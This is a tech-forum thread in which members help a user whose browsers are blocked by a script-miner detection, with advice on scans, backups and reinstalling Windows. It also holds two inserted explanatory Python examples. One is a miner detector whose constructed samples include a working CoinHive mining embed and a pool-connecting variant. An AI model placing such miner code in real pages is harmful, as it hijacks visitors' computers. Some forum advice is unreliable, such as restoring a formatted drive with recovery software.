# HEUR.Trojan script miner gen malware



## andy_65_in (Oct 29, 2019)

Using KIS paid version...my laptop can't use any browser...when I open any browser I get this input that requested URL can't be accessed as object is infected by above-named virus.. which it claims can't be disinfected...please help me...frustrated by this crap of KIS version...


----------



## bssunilreddy (Oct 29, 2019)

andy_65_in said:


> Using KIS paid version...my laptop can't use any browser...when I open any browser I get this input that requested URL can't be accessed as object is infected by above-named virus.. which it claims can't be disinfected...please help me...frustrated by this crap of KIS version...


Format the system after taking back up or you can recover files after you format also.

Sent from my Nokia 8.1 using Tapatalk


----------



## Desmond (Oct 29, 2019)

> HEUR

It means that the URL was blocked because of heuristic scan by the AV. Heuristic means that it was blocked based on behaviour and not because of a virus definition. This means that this could be a false positive, but it's better to check before you dismiss it completely.

Could you take a HijackThis scan of your system and post the logs here?

Edit: Link - HiJackThis
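
The difference between a definition match and a heuristic verdict described in the post above, as an added example that is not part of the thread and not any vendor's engine. The traits, weights and threshold are illustrative assumptions, and all four samples are constructed.

```python
import hashlib
import re

# --- Constructed samples (not taken from the thread) ---------------------
# Shaped like the embed that detections such as Trojan:JS/CoinHive are named after.
KNOWN_MINER = (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    '<script>new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER").start();</script>'
)
# Same behaviour, different bytes: renamed and self-hosted, so no hash matches.
RENAMED_MINER = (
    '<script>var n = navigator.hardwareConcurrency;'
    'for (var i = 0; i < n; i++) new Worker("/static/w.js");'
    'WebAssembly.instantiate(cryptonightBytes);'
    'var s = new WebSocket("wss://pool.example.invalid");</script>'
)
# A legitimate photo editor that happens to use the same browser features.
PHOTO_EDITOR = (
    '<script>var n = navigator.hardwareConcurrency;'
    'new Worker("/filters.js"); WebAssembly.instantiate(filterBytes);'
    'new WebSocket("wss://sync.example.invalid");</script>'
)
PLAIN_PAGE = "<html><body><h1>News</h1></body></html>"

# "Virus definition": an exact fingerprint of a sample seen before.
SIGNATURES = {hashlib.sha256(KNOWN_MINER.encode()).hexdigest()}

# Heuristic: weighted traits of what the script does (illustrative values).
TRAITS = [
    (re.compile(r"coinhive", re.I), 3, "references coinhive"),
    (re.compile(r"cryptonight", re.I), 3, "references CryptoNight hashing"),
    (re.compile(r"WebAssembly\."), 1, "loads WebAssembly"),
    (re.compile(r"new\s+Worker\("), 1, "spawns web workers"),
    (re.compile(r"navigator\.hardwareConcurrency"), 1, "counts CPU cores"),
    (re.compile(r"new\s+WebSocket\("), 1, "opens a WebSocket"),
]
THRESHOLD = 4


def heuristic_score(content):
    """Return (score, reasons) for every trait present in the content."""
    hits = [(weight, why) for rx, weight, why in TRAITS if rx.search(content)]
    return sum(weight for weight, _ in hits), [why for _, why in hits]


def classify(content):
    """Return (verdict, score, reasons); definitions are checked first."""
    digest = hashlib.sha256(content.encode()).hexdigest()
    if digest in SIGNATURES:
        return ("signature", 0, ["exact match with a known sample"])
    score, reasons = heuristic_score(content)
    if score >= THRESHOLD:
        return ("heuristic", score, reasons)
    return ("clean", score, reasons)


if __name__ == "__main__":
    samples = [("known miner", KNOWN_MINER), ("renamed miner", RENAMED_MINER),
               ("photo editor", PHOTO_EDITOR), ("plain page", PLAIN_PAGE)]
    for name, content in samples:
        verdict, score, reasons = classify(content)
        print(f"{name:14} {verdict:10} score={score} {reasons}")
```

The renamed miner is caught only by the heuristic, and the photo editor is flagged by the same rules, which is the false-positive case the post mentions.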


----------



## andy_65_in (Oct 29, 2019)

Desmond, I can't access any website from my infected PC....but I can access the net through my mobile using the same router...in fact I'm using the mobile to post this thread


----------



## meetdilip (Oct 29, 2019)

Did you try opening NDTV, Google etc.? If all are having the same issue, download Malwarebytes (ask help from a friend), install it on the infected PC and run a scan.


----------



## whitestar_999 (Oct 30, 2019)

Still no harm in scanning the system with malwarebytes free just to be on safe side.


----------



## andy_65_in (Oct 30, 2019)

Ok...should I change the AV....from KIS to ??


----------



## Desmond (Oct 30, 2019)

I stopped using Kaspersky after they were compromised by the Russian government. Currently using Bitdefender but it runs really slow, won't renew its subscription. ESET I think is the next best option.


----------



## meetdilip (Oct 30, 2019)

If it works for you and you are happy with it, no need to change. However, if you wish to, there are options like  Avast which works well.


----------



## andy_65_in (Oct 30, 2019)

whitestar_999 said:


> Still no harm in scanning the system with malwarebytes free just to be on safe side.


Scanned using malwarebytes...detected 83 threats!!!quarantined


----------



## whitestar_999 (Oct 30, 2019)

As expected, system itself was compromised. Format the C drive & reinstall Windows, I am guessing system was infected before you installed KIS (if browsers were not working since the day you installed KIS). Also don't use/install Win 7 now (if using) as its support is ending on 14th Jan 2020. Upgrade to either Win 8.1 or Win 10 latest version & regularly update it.


----------



## andy_65_in (Oct 30, 2019)

I have original Win 8 updated to 10 through free update...KIS was working fine since many months...Windows 10 regularly updating...what should I do now...second scan with Malwarebytes revealed 1 more threat, removed...then Malwarebytes updated...rescan third time no threats...should I throw out KIS..it's still interfering..getting the same threat...KIS is only permitting surfing when in protection I disable web anti virus option...but then warning comes up of computer being insecure...what should I do...no problem in surfing the net using my phone using the same net provider and same router


----------



## bssunilreddy (Oct 30, 2019)

ESET NOD32 Premium @ 1295 (1 PC - 1 Year)@ amazon.in
Check it because I could not provide the link via tapatalk

Sent from my Nokia 8.1 using Tapatalk


----------



## whitestar_999 (Oct 30, 2019)

Format & reinstall Win 10, don't take any chances with a compromised PC. This time use Avira free for first few months & if you like it then you can buy its pro version. Also keep all your browsers updated (prefer Chrome & Firefox with adblock extensions).


----------



## pkkumarcool (Oct 30, 2019)

Yes, format the system completely, reinstall Windows, don't take chances.


Sent from my iPhone using Tapatalk


----------



## pkkumarcool (Oct 30, 2019)

bssunilreddy said:


> Format the system after taking back up or you can recover files after you format also.
> 
> Sent from my Nokia 8.1 using Tapatalk



Can you link a guide for it?


Sent from my iPhone using Tapatalk


----------



## Desmond (Oct 30, 2019)

meetdilip said:


> Avast


Avast Online Security and Avast Secure Browser are spying on you



pkkumarcool said:


> Can you link a guide for it?
> 
> 
> Sent from my iPhone using Tapatalk


It's pretty easy to do.

Make a bootable Windows USB using their media creator tool: Download Windows 10. Use a clean machine to do this just to be safe.

Then, back up all your data and reboot using the bootable USB you created. After that just select your former C: partition and format it in the Windows setup dialog box. Then install into the newly formatted partition.

You can find guides online to do this, or you can ask here if you want more detailed steps.


----------



## pkkumarcool (Oct 30, 2019)

What is the best antivirus then? Also backup takes a very long time if you copy to external HDD


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Oct 30, 2019)

Which free cloud to dump my photos etc before format


----------



## pkkumarcool (Oct 30, 2019)

andy_65_in said:


> Which free cloud to dump my photos etc before format



No free cloud, try Google Drive for 1 GB space


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Oct 30, 2019)

andy_65_in said:


> Which free cloud to dump my photos etc before format


Gmail account 15 GB free, make multiple accounts depending on how much space you need.


----------



## whitestar_999 (Oct 30, 2019)

pkkumarcool said:


> What is the best antivirus then ? Also backup takes very long time if you copy to external hdd


There is no "best antivirus", only good antivirus programs. Also if you do not follow good security policies (like not clicking on any link without any thought especially if received via email/popup/messenger, regularly updating antivirus/Windows/browsers & not browsing shady sites/torrents (unless you already know what steps need to be taken while doing this)) then no antivirus will help you.


----------



## meetdilip (Oct 30, 2019)

Formatting C drive only is a decade old trick. Viruses are now smart enough. They hide in other drives and come back after reinstall. Filter your data, take a backup, do a full wipe and reinstall Windows.


----------



## meetdilip (Oct 30, 2019)

Desmond David said:


> Avast Online Security and Avast Secure Browser are spying on you



What you say is true. I myself felt it. Not just browser, it reads the content of your documents, access webcam as a spy etc etc. Every antivirus is doing this, legally or otherwise. I decided to stick with Avast for the moment.


----------



## pkkumarcool (Oct 30, 2019)

whitestar_999 said:


> There is no "best antivirus", only good antivirus programs. Also if you do not follow good security policies (like not clicking on any link without any thought especially if received via email/popup/messenger, regularly updating antivirus/Windows/browsers & not browsing shady sites/torrents (unless you already know what steps need to be taken while doing this)) then no antivirus will help you.



I know the basic etiquette, just want to know which antivirus to buy, the forum can definitely decide.


Sent from my iPhone using Tapatalk


----------



## pkkumarcool (Oct 30, 2019)

I myself am using Avast. It is best, from what I heard, regarding speed of PC. It doesn't slow down the PC much.


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Oct 31, 2019)

meetdilip said:


> Formatting C drive only is a decade old trick. Viruses are now smart enough. They hide in other drives and come back after reinstall. Filter your data, take a backup, do a full wipe and reinstall Windows.


No they don't unless it is a firmware/hardware virus & chances of getting infected by those for a typical user is almost zero. Simply formatting the C drive & then immediately installing a good AV after installing Windows & its updates & before touching any other drive/installing any other software is enough.


----------



## whitestar_999 (Oct 31, 2019)

pkkumarcool said:


> I myself using avast.It is best in case what i heard regarding speed of pc.It doesn’t slow down pc much.
> 
> 
> Sent from my iPhone using Tapatalk


It all depends on your PC, there are people who say Bitdefender/KIS can make their i7 32 GB RAM SSD system crawl while others say it runs fine. Only way to be sure is by first using it for few weeks/month on your PC. Btw I prefer Avira free over Avast.


----------



## andy_65_in (Oct 31, 2019)

Transferring my data to Google Drive...really frustrated with Kaspersky....these chaps don't respond on so-called tech support tele....C drive badly infested as every scan with Malwarebytes free version shows viruses which I continue to quarantine...once data saved in cloud will undertake formatting...bye bye KIS for me..bloody letdown


----------



## bssunilreddy (Oct 31, 2019)

andy_65_in said:


> Transferring my data to Google Drive...really frustrated with Kaspersky....these chaps don't respond on so-called tech support tele....C drive badly infested as every scan with Malwarebytes free version shows viruses which I continue to quarantine...once data saved in cloud will undertake formatting...bye bye KIS for me..bloody letdown


Buy ESET NOD32 Premium 1PC 1Year edition from Amazon @ 1.25k

Link:ESET Smart Security Premium - 1 Device, 1 Year (CD) *www.amazon.in/dp/B0777GH1CX/ref=cm_sw_r_sms_apa_i_vgJUDbWJ3RDTX

Good AV uses less resources.

Sent from my Nokia 8.1 using Tapatalk


----------



## pkkumarcool (Oct 31, 2019)

bssunilreddy said:


> Buy ESET NOD32 Premium 1PC 1Year edition from Amazon @ 1.25k
> 
> Link:ESET Smart Security Premium - 1 Device, 1 Year (CD) *www.amazon.in/dp/B0777GH1CX/ref=cm_sw_r_sms_apa_i_vgJUDbWJ3RDTX
> 
> ...



Why are you recommending ESET?


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Oct 31, 2019)

pkkumarcool said:


> why you recommending eset?
> 
> 
> Sent from my iPhone using Tapatalk


ESET NOD32 is a good AV, that's why.

Sent from my Nokia 8.1 using Tapatalk


----------



## whitestar_999 (Oct 31, 2019)

bssunilreddy said:


> Good AV uses less resources.


Bad AV also uses less resources. Don't give such false logic.


----------



## bssunilreddy (Oct 31, 2019)

whitestar_999 said:


> Bad AV also uses less resources.Don't give such false logic.


Yes it uses less resources
But Bit Defender is also good
Since OP wants a stand alone AV which detects his infected PC 
I suggested but if you know better then suggest

Sent from my Nokia 8.1 using Tapatalk


----------



## meetdilip (Oct 31, 2019)

andy_65_in said:


> as every scan with malwarebytes freeversion shows viruses which i continue to quarantine.



That is because the root of virus is not in the C drive. You delete from C drive, it will replace it. No matter how many times you delete /quarantine it.


----------



## cute.bandar (Oct 31, 2019)

Do full system scans in safe mode. This is important. Otherwise there is full chance of the virus not getting deleted, even after getting detected / quarantined.

You don't need to do so much antivirus juggling. First scan with Defender, then maybe with something else. You can go into "safe mode with networking" option, and then scan using online scanners. Online scanners are basically temporary on-demand scanners. Only used them ages ago.

If the AV doesn't work, before formatting try "Windows built-in reset functionality", not as effective as full format, but it will stop the virus from running. They might still remain in the hard disk.

Also


----------



## whitestar_999 (Oct 31, 2019)

No point wasting time with such an infected PC, format the C drive & reinstall Windows & install Avira free (preferred) or Bitdefender free & use it for few weeks. If you like it then buy the pro version.

P.S. After formatting the C drive & reinstalling Windows, don't do anything else but just install antivirus first (aka no double clicking any other drive/file outside of C drive or installing other software).


----------



## bssunilreddy (Oct 31, 2019)

Best Windows 10 antivirus of 2019 | TechRadar


----------



## cute.bandar (Oct 31, 2019)

Actually "windows reset" reinstalls windows. Keeping personal files is optional. I would recommend doing that. 
What matters most is that the virus does not start when windows boots. Second thing that's really important is modification of system files. A virus that does that, is as good as running all the time. Don't know how many av check this. But it can and should be manually checked - *support.microsoft.com/en-in/help/9...er-tool-to-repair-missing-or-corrupted-system

In safe mode, open admin command prompt. Run following 2 commands.


> DISM.exe /Online /Cleanup-image /Restorehealth
> sfc /scannow



With a windows reinstall all those settings go back to default and the virus does not start at all.


----------



## whitestar_999 (Oct 31, 2019)

Not worth taking the chance, nowadays online security is very important unlike a few years ago. A system once infected cannot be trusted especially if it is a primary system used for sensitive/financial tasks. Recommended solution is to format the C drive & start afresh.


----------



## SaiyanGoku (Oct 31, 2019)

^ Agreed. I would've taken a backup of non-executables using HBCD or Live linux usb and then re-installed windows using a drive which hasn't been plugged into the infected OS.


----------



## meetdilip (Oct 31, 2019)

SaiyanGoku said:


> using HBCD



Hiren's Boot CD? Is it still around?


----------



## SaiyanGoku (Oct 31, 2019)

meetdilip said:


> Hiren's Boot CD ? Is it still around ?


Yes, and x64 version is maintained by community/fans
Hiren's BootCD PE


----------



## meetdilip (Oct 31, 2019)

I see. Someone told me that it got abandoned some time ago.


----------



## whitestar_999 (Oct 31, 2019)

meetdilip said:


> I see. Someone told me that it got abandoned some time ago.


Sometimes the original developer abandons a project but community/fans keep it updated,you can say it is "officially abandoned" but not "practically abandoned".


----------



## pkkumarcool (Oct 31, 2019)

If I use a live CD for backup from HDD to external HDD, can I still get infected?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Oct 31, 2019)

I have the OEM Windows keys with me..after formatting...will I go back to the original Win 8 or the later freely updated Win 10


----------



## cute.bandar (Oct 31, 2019)

I did a bit of digging and it turns out:
- I stand corrected. The reset method indeed isn't 100% safe.. the Windows reset image itself can be infected by sophisticated virus. But many say that reset is safe for almost all cases.
- If you are concerned with the reset, use Windows refresh. A fresh Windows .wim image is downloaded, so equivalent to a format, only much much simpler. See here: *superuser.com/a/1151479

Notes:
Many here are very trusting of antivirus. But it's fairly easy to make virus undetectable with crypters and packers.
See here: Malware Crypters - the Deceptive First Layer - Malwarebytes Labs
The above is an analysis of a basic publicly available for non-technical a**hole-malware-spreading-people. It even has a GUI.
There are also crypter 'services'. Upload virus -> get undetectable package.

Hiren's BootCD and similar tools are useful, but terrible from a security point of view! Lots of binaries from unknown sources, many proprietary


----------



## whitestar_999 (Oct 31, 2019)

pkkumarcool said:


> If i use live cd for backup from hdd to external hdd can i still get infected?
> 
> 
> Sent from my iPhone using Tapatalk


If you also copy infected files to external hdd & then run those files later then yes.



andy_65_in said:


> i have the OEM windows keys with me..after formatting...will i go back to the original win 8 or the later freely updated win 10


Win 10 activation remembers a system's hardware unique ID code that it generates during activation & this info is saved on MS activation servers. As long as hardware remains the same you need not enter any key & system will be automatically activated after going online.


----------



## whitestar_999 (Oct 31, 2019)

cute.bandar said:


> I did a bit of digging and it turns out.
> - I stand corrected. The reset method isn't indeed 100% safe.. the Windows reset image itself can itself be infected by sophisticated virus. But many say that reset is safe for almost all cases.
> - If you are concerned with the reset. Use Windows refresh. A fresh windows .wim image is downloaded, so equivalent to a format, only much much simpler. See here: *superuser.com/a/1151479
> 
> ...


Those crypters/packers can avoid old traditional signature based detection, not the latest ones like sandboxing/behaviour analysis etc. This is also why nowadays an AV's effectiveness depends a lot on internet connection as much processing is done online at AV company's end to analyse a file's behaviour compared to relying on stored virus signatures in user PC. Tools like Hiren's Boot CD are also customizable so one can make their own CD/DVD by using scripts (available on major tech forums) & own source programs.


----------



## andy_65_in (Oct 31, 2019)

In formatting...I keep my files or remove everything...also remove my files or remove and clean my drive...which options to choose in my case


----------



## cute.bandar (Oct 31, 2019)

> not the latest ones like sandboxing/behaviour analysis etc.


I don't know the exact purpose of crypters. If they only change the signature then yeah they will be limited. But the heuristics game is a cat and mouse game. Antivirus come with methods to detect, malware dev come with methods to bypass them.. there is no clear winner yet. Point is many new virus released are FUD - fully undetectable. And 100,000 are released every day.


> Tools like hiren boot cd are also customizable so one can make their own cd/dvd by using scripts(available on major tech forums) & own source programs.


Sure, if the software is obtained from open source trusted places. but most download random iso


----------



## whitestar_999 (Oct 31, 2019)

I agree it is a cat & mouse game but you have to be either very unlucky (in which case nothing will save you anyway) or very careless while being online (again nothing will save you in this case either) to encounter such "sophisticated malware". E.g. nowadays it only takes mere hours from the first appearance of such sophisticated malware to their detection added to cloud technology of AV companies. Of course this is applicable only to typical home user & not corporate/institutions which need professional help if they really care about their security.


----------



## cute.bandar (Nov 1, 2019)

Not sure how difficult it is to make FUD malware. Some crypter services, whatever they do, they run them through VirusTotal-like services, so several/many/most would be FUD. Also the criminals here are very organized.
Again not sure how long it takes such malware to be detected and added to the database. Considering the prevalence of ransomware it may not be that true me think. But if what you say is true, then Windows Defender should be the most capable AV, and no other AV should be required, since it's present and enabled in almost every PC.

btw whitestar you sound very knowledgeable in this. I am curious about the source of your knowledge. Any pro experience?  NOT trying to diss. Just curious.
Mine is a long time curious nerd, all over the internet.


----------



## bssunilreddy (Nov 1, 2019)

NORTON ANTI-VIRUS CLASS ACTION
Toronto law firm Investigation Counsel Professional Corporation has launched a proposed class action against Symantec Corporation. Those affected are all Ontario residents who purchased Norton  branded security and antivirus software anytime  between July 2010 through July 2016.
This case arises out of recent news reports that, for at least seven years, there were critical vulnerabilities in a large number of Norton security and antivirus software products.  Not only did these longstanding and serious vulnerabilities make the protection and security features of  Norton antivirus software products less effective, they also allegedly made users of those products more susceptible to security breaches due to hacking, malware, and computer viruses. Investigation Counsel believes that Ontario residents who purchased these allegedly defective  Norton security and antivirus software products may be entitled to compensation.
If you purchased a Norton security or antivirus software product, please contact John Archibald at 416-637-3152 , by email at jarchibald@investigationcounsel.com or by filling out the form below.
Source:NORTON ANTI-VIRUS CLASS ACTION | Fraud Recovery Lawyers | Investigation Counsel PC

This is some of the things corporate firms do to remain in business.


----------



## pkkumarcool (Nov 1, 2019)

I would still recommend to take backup of other than C drive using live CD and then format everything. Don't take chances, software viruses and malware have become smart. Also would like to say use a proper AV, Windows Defender is only good for people who are smart enough and don't click any stuff. I personally use Avast, it gives me warning notification before opening URL whenever I click bad stuff.


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Nov 1, 2019)

pkkumarcool said:


> I would still recommend to take backup of other than C drive using live CD and then format everything. Don't take chances, software viruses and malware have become smart. Also would like to say use a proper AV, Windows Defender is only good for people who are smart enough and don't click any stuff. I personally use Avast, it gives me warning notification before opening URL whenever I click bad stuff.
> 
> 
> Sent from my iPhone using Tapatalk


Just format the PC and then recover C drive using EaseUS Recovery software. After formatting any virus will disappear and then you can easily recover.


----------



## pkkumarcool (Nov 1, 2019)

bssunilreddy said:


> Just format the PC and then recover C Drive using Easus Recovery software. After formatting any virus will disappear and then you can easily recover.



I dont think Easus Recovery Software is free 


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Nov 1, 2019)

pkkumarcool said:


> I dont think Easus Recovery Software is free
> 
> 
> Sent from my iPhone using Tapatalk


Even with this a certain amount of storage can be recovered and one can buy it rather wasting time over what to do with an infected PC.


----------



## pkkumarcool (Nov 1, 2019)

bssunilreddy said:


> Even with this a certain amount of storage can be recovered and one can buy it rather wasting time over what to do with an infected PC.



Any free suggestions?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 1, 2019)

If you take a backup, make sure it does not have malicious file in it. Because once you do a clean install and put them back, malware will also come back.


----------



## andy_65_in (Nov 1, 2019)

meetdilip said:


> If you take a backup, make sure it does not have malicious file in it. Because once you do a clean install and put them back, malware will also come back.


I have backed up in Google Drive...will this be a problem...also can I use a recovery software like EaseUS in the same affected PC


----------



## whitestar_999 (Nov 1, 2019)

andy_65_in said:


> I have backed up in google drive...will this be a problem...also can i use a recovery software like easus in the same affected pc


If you back up an infected file or recover an infected file then it will be an issue. Scan all backed up data & recovered data on another clean system before restoring it on original PC.

@pkkumarcool the above also applies to you. @bssunilreddy recovering data does not differentiate between infected files & clean files, don't recommend it for infected systems.
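
One way to act on the advice in this thread to back up only non-executables and to check backed-up data before restoring it, as an added example (not from any poster). The function names, the extension list and the sample files are assumptions made for illustration. It only narrows what gets restored; files it passes still need the antivirus scan the post above asks for.

```python
import os
import tempfile

# File types Windows will run or interpret when opened (illustrative list).
RUNNABLE_EXT = {".exe", ".dll", ".scr", ".com", ".msi", ".bat", ".cmd",
                ".vbs", ".js", ".ps1", ".hta", ".lnk", ".docm", ".xlsm"}

# Leading bytes a genuine image of each type must start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def inspect_file(path):
    """Decide from the name and the first bytes whether a file is held back."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(8)
    # A program stays a program whatever extension it was renamed to.
    if head.startswith(b"MZ"):
        return "hold: Windows executable header"
    # The last extension decides what Windows does, so photo.pdf.js is a script.
    if ext in RUNNABLE_EXT:
        return "hold: runnable file type " + ext
    # A "photo" that does not start like one is something else in disguise.
    if ext in IMAGE_MAGIC and not head.startswith(IMAGE_MAGIC[ext]):
        return "hold: content is not a real " + ext
    return "restore"


def triage(root):
    """Walk a backup folder and return {relative path: verdict}."""
    verdicts = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            verdicts[rel] = inspect_file(full)
    return verdicts


def build_sample_backup(root):
    """Write a small constructed backup tree used to demonstrate triage()."""
    samples = {
        "photos/beach.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,   # real JPEG start
        "photos/holiday.jpg": b"MZ\x90\x00" + b"\x00" * 16,       # program renamed .jpg
        "photos/scan.png": b"<script>not an image</script>",      # wrong content
        "docs/notes.txt": b"shopping list\n",
        "docs/invoice.pdf.js": b"// constructed placeholder\n",   # double extension
    }
    for rel, data in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as backup:
        build_sample_backup(backup)
        for rel, verdict in sorted(triage(backup).items()):
            print(f"{verdict:40} {rel}")
```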


----------



## whitestar_999 (Nov 1, 2019)

cute.bandar said:


> Not sure how difficult it is to make FUD malware. Some crypter services, whatever they do, they run them through virustotal like services, so several/many/most would be FUD. Also the criminals here are very organized.
> Again not sure how long it takes such malware to be detected and added to the database. Considering the prevalance of ransomware it may not be that true me think. But if what you say is true, then windows defender should be the most capable av, and no other av should be required, since its present and enabled in almost every PC.
> 
> btw whitestar you sound very knowledgeable in this. I am curious about the source of your knowledge. Any pro experience?  NOT trying to diss. Just curious.
> Mine is a long time curious nerd, all over the internet.


The prevalence of ransomware is mainly because of "user action" against which there are no solutions (what can you do if somebody decides to click & run a file despite warning) & the fact that most targets use old unpatched Windows versions (WannaCry exploited SMB v1.0 vulnerability for which MS released patch in Apr 2017 & WannaCry attack started in May 2017) which cannot be protected by simply using an AV.

Windows Defender is recently scoring 100% in AV-Comparatives tests which should tell you something. In fact there is a corporate version of Windows Defender which is much more advanced.
Microsoft Data Breach & Endpoint Security - Microsoft 365
Why Windows Defender Antivirus is the most deployed in the enterprise - Microsoft Security


> Approximately 96% of all malware is polymorphic – meaning that it is only experienced by a single user and device before it is replaced with yet another malware variant. *This is because in most cases malware is caught nearly as fast as it’s created, so malware creators continually evolve to try and stay ahead.* Data like this hammer home how important it is to have security solutions in place that are as agile and innovative as the attacks.



I just like to read, nothing else. You can spend some time at Wilders forum, best starting point for gathering some good security related technical info (it also has probably the best backup & imaging related forum section with many experts).


----------



## meetdilip (Nov 1, 2019)

andy_65_in said:


> I have backed up in google drive...will this be a problem...also can i use a recovery software like easus in the same affected pc



Backup files that you trust, nothing else. I hope you know that virus can get into subfolders and hide in it, only to spread malware to the whole computer when they get a chance. Make sure you scan the backup data. 

But since you are using Google Drive, there is a good chance that no virus got through. Because Google has one of the most effective scans on their system.


----------



## andy_65_in (Nov 1, 2019)

whitestar_999 said:


> If you backup up an infected file or recover an infected file then it will be an issue.Scan all backed up data & recovered data on another clean system before restoring it on original pc.
> 
> @pkkumarcool above also apply to you. @bssunilreddy recovering data does not differentiate between infected files & clean files,don't recommend it for infected systems.


Tell me...simply..I've backed up my data in Google Drive...can I use this data again or not


----------



## andy_65_in (Nov 1, 2019)

Trying formatting...after reset this PC command...I get choose an option..I choose remove everything.but after that it takes me to --additional settings where I have to choose between current settings (just remove your files, quicker but less secure) or change settings which when I check leads me to another page where two options are shown in same row 1. data erasure_just remove your files..quicker but less secure or data drives--remove all files from only drive where Windows installed..I haven't understood all this...much different from what is shown in hp.com....what should I do


----------



## pkkumarcool (Nov 1, 2019)

andy_65_in said:


> tell me ...simply..ive backed up my data in google drive...can i use this data again or not



Don't trust Google Drive, scan your PC and look for affected files in virus chest, don't back up those files, then you're safe. Btw how much data have you backed up?


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Nov 1, 2019)

andy_65_in said:


> tell me ...simply..ive backed up my data in google drive...can i use this data again or not


You can after downloading & scanning it with antivirus on same system after windows reinstall/different non-infected system.


----------



## andy_65_in (Nov 2, 2019)

pkkumarcool said:


> Dont trust google drive, scan your pc and look for affected files in virus chest dont backup those files then you’re safe.Btw how much data have you backed up?
> 
> 
> Sent from my iPhone using Tapatalk


I've backed up my photos and some files in Google Drive


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> ive backed up my photos and some files in google drive



Have you scanned your pc with antivirus and checked if photos or other files are infected or not?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 2, 2019)

While attempting Google Chrome download after format of my PC...I got a remediation incomplete warning on Win Defender..I stopped the download...scan by both Win Defender and Malwarebytes showed no threats..but when I check protection history...I see..remediation incomplete with threat shown as trojan.js/coinhive...alert severe...affected item is/was C drive.....Chrome installer...I am bloody confused...using right now in newly formatted laptop only Defender and Malwarebytes


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> While attempting Google Chrome download after format of my PC...I got a remediation incomplete warning on Win Defender..I stopped the download...scan by both Win Defender and Malwarebytes showed no threats..but when I check protection history...I see..remediation incomplete with threat shown as trojan.js/coinhive...alert severe...affected item is/was C drive.....Chrome installer...I am bloody confused...using right now in newly formatted laptop only Defender and Malwarebytes



Defender and Malwarebytes isn't enough, check with all software below.
The first one is the most important one.

1. Antivirus
2. Adwcleaner
3. Malwarebytes
4. rKill
5. RogueKiller


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 2, 2019)

pkkumarcool said:


> Defender and malwarebytes isnt enough check with all software below
> The first one is the most important one.
> 
> 1.Antivirus
> ...


What are these...I couldn't understand


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> What are these...i couldnt understand



These are malware, trojan removal software, as important as antivirus


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 2, 2019)

andy_65_in said:


> .affected item is/was c drive.....chrome installer..



Possible cases

1. False-positive, which program flagged it?

2. Some virus renamed and changed itself as Chrome installer

But that is very rare if you are using a clean HDD.


----------



## andy_65_in (Nov 2, 2019)

meetdilip said:


> Possible cases
> 
> 1. False-positive, which program flagged it ?
> 
> ...


Full scan using defender shows no threat...could be a false input


----------



## whitestar_999 (Nov 2, 2019)

Post screenshots of the warnings here along with the files giving warnings. Also install Avira Free just for now & update it to scan the whole PC. You can remove it afterwards if no threats are found.


----------



## meetdilip (Nov 2, 2019)

Normally a scan using Malwarebytes is enough. There are other tools like AdwCleaner which can be helpful as well. Coin hive, if I understand correctly, is a crypto currency miner. You will need an antivirus with a module to detect such miners to fix that.


----------



## andy_65_in (Nov 2, 2019)

meetdilip said:


> Normally a scan using Malwarebytes is enough. There are other tools like AdwCleaner which can be helpful as well. Coin hive, if I understand correctly, is a crypto currency miner. You will need an antivirus with a module to detect such miners to fix that.


Any free type of this av


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> Post screenshots of the warnings here along with the files giving warnings. Also install Avira Free just for now & update it to scan the whole PC. You can remove it afterwards if no threats are found.


Cant post screenshot...but i get this...remediation incomplete..threat trojan js coinhive..affected items...a long file in c drive..roughly called c/users/app data/local/temp...but when i scan using malwarebytes and zemana..no threat


----------



## andy_65_in (Nov 2, 2019)

Scanned now using avira free...all clear...im now going mad....what should i do...format this laptop again...and sell the damn thing


----------



## meetdilip (Nov 2, 2019)

andy_65_in said:


> Any free type of this av



Looks like Malwarebytes has some expertise in it

Cryptojacking definition – What is it, and how can you prevent it?

I have seen those only in paid modules. All I can say now is scan your data with your AV and Malwarebytes and then use your system until there is some malware warning. Most people like us do not have anything precious on our PC to steal.


----------



## whitestar_999 (Nov 2, 2019)

andy_65_in said:


> Cant post screenshot...but i get this...remediation incomplete..threat trojan js coinhive..affected items...a long file in c drive..roughly called c/users/app data/local/temp...but when i scan using malwarebytes and zemana..no threat





andy_65_in said:


> Scanned now using avira free...all clear...im now going mad....what should i do...format this laptop again...and sell the damn thing


It seems like a temporary internet webpage file created (& probably active only) inside a browser while being connected to the net. If the system is not connected to the net then it should show no threat. Also, this file can be created by simply visiting some affected website. Delete everything inside the temp folder where this file is located, then connect to the net & browse some sites you usually visit using the browsers you generally use while letting Avira Free run in the background. If you get no warning then everything is fine. From next time onwards, whenever you visit a site infected with such malware, Avira will block it, giving you a similar warning "coinhive.js.. detected & quarantined".


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


